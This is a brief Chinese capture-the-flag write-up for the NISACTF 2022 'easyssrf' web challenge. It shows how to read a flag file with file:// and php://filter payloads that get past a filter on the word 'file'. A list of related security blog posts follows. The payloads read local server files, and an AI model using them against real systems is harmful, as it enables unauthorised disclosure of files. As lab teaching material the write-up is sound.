[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统

它提醒我们输file:///fl4g

它提醒我们输ha1x1ux1u.php

看到代码stristr($file, "file")当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过

file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码

file=php://filter/resource=/flag

file=/flag


相关推荐
王火火(DDoS CC防护)2 小时前
如何判断服务器是否遭受攻击?
服务器·web安全·网络安全·ddos攻击
witkey_ak989621 小时前
网安面试题收集(4)
网络安全
kali-Myon1 天前
NewStarCTF2025-Week3-Web
sql·安全·web安全·php·ctf
网安INF1 天前
网络攻防技术:防火墙技术
网络·安全·web安全·网络安全·防火墙
介一安全2 天前
【Frida Android】基础篇12:Native层hook基础——调用原生函数
android·网络安全·逆向·安全性测试·frida·1024程序员节
m0_738120722 天前
网络安全编程——TCP客户端以及服务端Python实现
python·tcp/ip·安全·web安全·网络安全
白帽子黑客罗哥2 天前
Redis实战深度剖析:高并发场景下的架构设计与性能优化
redis·网络安全·性能优化·高并发·分布式锁·秒杀系统·缓存架构
半路_出家ren2 天前
设计一个学生管理系统的数据库
linux·数据库·sql·mysql·网络安全·数据库管理员
儒道易行2 天前
【攻防实战】Redis未授权RCE联动metasploit打穿三层内网(上)
数据库·redis·网络安全·缓存